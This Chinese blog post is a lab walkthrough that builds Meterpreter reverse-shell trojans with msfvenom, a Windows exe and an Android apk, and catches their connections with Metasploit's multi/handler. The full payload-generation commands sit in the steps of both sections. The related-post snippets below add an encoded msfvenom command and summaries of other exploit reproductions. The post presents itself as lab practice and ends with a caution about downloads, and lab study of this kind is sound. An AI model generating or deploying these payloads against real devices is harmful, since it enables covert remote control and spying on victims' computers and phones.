手机+win木马远程复现

于 2023-09-14 10:06:48 发布
阅读量36 收藏 1
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77538736/article/details/132868898
版权

复现windows木马远程

环境

  • kali ip:192.168.134.128
  • win7 ip:192.168.134.121

开始复现

  • 登录kali root权限
    在这里插入图片描述
  • 制作exe程序
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.134.128 LPORT=6060 exe > 1.exe
    在这里插入图片描述
    制作成功
  • 把1.exe程序放到win7系统里
    在这里插入图片描述
  • 通过命令启动Metasploit
    msfconsole在这里插入图片描述
    启动成功
  • 运行模块
    use exploit/multi/handler
    在这里插入图片描述
  • 更改信息
    在这里插入图片描述
    更改完成
  • 运行模块监听
    在这里插入图片描述
  • 打开win7系统运行1.exe程序
    在这里插入图片描述
    在这里插入图片描述
    成功监听到目标机
  • 截个桌面图看看
    在这里插入图片描述
    成功截取到

手机远程木马复现

环境

  • Android ip:192.168.1.100
  • kali ip:192.168.1.101

开始复现

  • 制作apk软件
  • msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=6061 >3.apk
    在这里插入图片描述
    制作成功
  • 通过命令启动Metasploit
    msfconsole
    在这里插入图片描述
    运行成功
  • 运行模块并更改参数
    在这里插入图片描述
  • 运行模块监听
    在这里插入图片描述
  • 在Android模拟器里点击安装包
    在这里插入图片描述
    在这里插入图片描述
    成功监听到并连接上

结尾

还有好多功能没有演示,再次说明网络上的各种软件链接谨慎下载。

Fmmy
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
漏洞复现:使用Kali制作木马程序
m0_51617352的博客
12-15 5797
攻击机:Kali2019 靶机:Win7 64位 攻击步骤: 1.打开Kali2019和Win7 64位虚拟机,确定IP地址在一个网段 2.确定好IP地址,进入Kali2019进行木马文件.exe制作,命令如下 命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=172.16.66.128 LPORT=5555 -f exe >pink.exe .
CVE-2020-27955 Git-LFS远程代码执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
06-10 1264
0x01 漏洞简介 Git LFS是Github开发的一个Git扩展,用于实现Git对大文件的支持。Windows平台上的Git-LFS版本<= 2.12上发现远程代码执行问题,一旦受害者克隆了恶意存储库并在其系统上运行了易受攻击的Git-LFS版本,就会立即执行有效载荷,漏洞编号为CVE-2020-27955。 0x02 影响版本 Git<=2.29.2、Git-LFS<=2.12,一些受影响的产品包括Git,GitHub CLI,GitHub Desktop,Visual Studio
手机木马远程控制复现
moli_a的博客
05-07 791
获取相关的命令进行实验,这次手机木马的实验就算完成了。此文章只用于个人学习分享,在实验时,可以自己用手机测试,不用故意发给别人恶搞。本次实验模拟的是msf,所以需要android模拟器,这里使用的是。点击设置>找到网络设置:开启网络桥接模式,IP设置DHCP。回到我们的kali,启动metasploit进行攻击。或者在kali中输入msfvenom -h。//这里LHOST设置成kali的ip。//端口设置成生成木马所监听的端口。下载、安装后进行环境配置。在模拟器运行木马,进行监听。
phpstudy后门检验+复现
weixin_44897902的博客
09-28 319
最近phpstudy被爆出有后门,当时我还毫不在意,觉得自己不可能…然后,打脸 看着自己的phpstudy2018,数据库突然出问题,才发现自己已经成为别人的肉鸡好多年。。。 快来看看你的phpstudy有没有这样的后门吧 准备工作:win10虚拟机,phpstudy20181102,bp抓包工具 找到PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll 记事...
win10 永恒之黑复现
niqiu320的博客
05-31 1710
永恒之黑复现 一:漏洞简介 漏洞原理: SMB远程代码执行漏洞 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。 Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-19 2721
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
kali2021和win7环境下勒索病毒复现
大大大鸡腿的博客
06-23 2285
勒索病毒 实验以kali作为攻击机,win7系统作为靶机,攻击时将win7防火墙关闭,不然会被拦截 首先查看靶机ip地址:192.168.231.130 攻击机ip地址:192.168.231.129 使用kali打开msf 然后我们搜索ms17模块 auxiliary渗透脚本测试,查看靶机是否存在永恒之蓝漏洞 注意:我这里使用的是msf6版本,如果想要使用哪个模块,直接输入模块编号就行,但如果是msf5,需要输入use 模块名 show options命令查看此模块需要的参数,发现有4个是必须的,
windows10 远程代码执行漏洞复现(CVE-2020-0796)
键盘上温暖而又美好的时光
05-20 2377
漏洞描述 2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。 漏洞危..
[Vulhub] Weblogic 漏洞复现
weixin_45605352的博客
09-11 2610
Weblogic 反序列化远程代码执行漏洞(CVE-2019-2725) 0x00 漏洞描述 Weblogic反序列化远程代码执行漏洞。由于在反序列化处理输入信息的过程中存在缺陷,未经授权的攻击者可以发送特意构造的恶意HTTP请求,利用该漏洞获取服务器权限,实现远程代码执行。 0x01 影响版本 Oracle WebLogic Server 10.* Oracle WebLogic Server 12.1.3 0x03 漏洞分析 该漏洞存在于wls9-async组件,该组件为异步通讯服务,攻击者可以在/
画廊效果+旋转木马效果 banner广告位 android
09-29
使用ViewPager实现画廊效果 + 旋转木马效果 + 缩放 banner广告位 ,已封装,配置简单。
win32汇编——dll远程注入
10-05
win32汇编实现dll远程注入。所谓DLL远程注入,就是强迫DLL程序运行在其他进程中,这样做的目的无非有两种:第一是伪装自身,第二是控制宿主。前者常见于病毒或木马,后者则一般用于正规之场合,比如常见的输入法、...
木马远程控制
06-14
一些关于木马远程控制; 木马是如何通信的; 木马是如何控制的; 如何清除木马; 与远程控制的文档学习及代码
Android手机木马病毒的提取与分析.pdf
04-22
利用dex2jar、jdgui 等工具软件查看apk 文件源代码。结合实例,讲述了如何提取关键代码与配置数据,并对手机木马病毒的危险函数、启动方式、权限列表进行分析,证明了该方法的可行性。
木马功放与远程控制
01-09
木马攻防与 远程控制 专用工具 捆绑 木马 “ ” 木马加壳解析 检测木马的加壳方式 迅雷也能查杀弹窗 木马 “ ” 微点主动防御软件 查杀木马 “ ” UltraVNC远程控制 开启和连接远程...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8241
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
QT5开发及实例配套源代码.zip
05-28
QT5开发及实例配套[源代码],Qt是诺基亚公司的C++可视化开发平台,本书以Qt 5作为平台,每个章节在简单介绍开发环境的基础上,用一个小实例,介绍Qt 5应用程序开发各个方面,然后系统介绍Qt 5应用程序的开发技术,一般均通过实例介绍和讲解内容。最后通过三个大实例,系统介绍Qt 5综合应用开发。光盘中包含本书教学课件和书中所有实例源代码及其相关文件。通过学习本书,结合实例上机练习,一般能够在比较短的时间内掌握Qt 5应用技术。本书既可作为Qt 5的学习和参考用书,也可作为大学教材或Qt 5培训用书。
grpcio-1.46.3-cp37-cp37m-musllinux_1_1_i686.whl
最新发布
05-28
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
大学生毕业答辨ppt免费模板【不要积分】下载可编辑可用(138).zip
05-28
大学生毕业答辨ppt免费模板【不要积分】下载可编辑可用(138).zip
python远程控制木马
09-05
远程控制木马是一种恶意软件,它通过网络连接远程主机,并允许攻击者在目标计算机上执行各种操作和命令。根据提供的引用内容,以下是一个使用Python编写的远程控制木马的示例代码: ```python # 服务端(server)程序...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值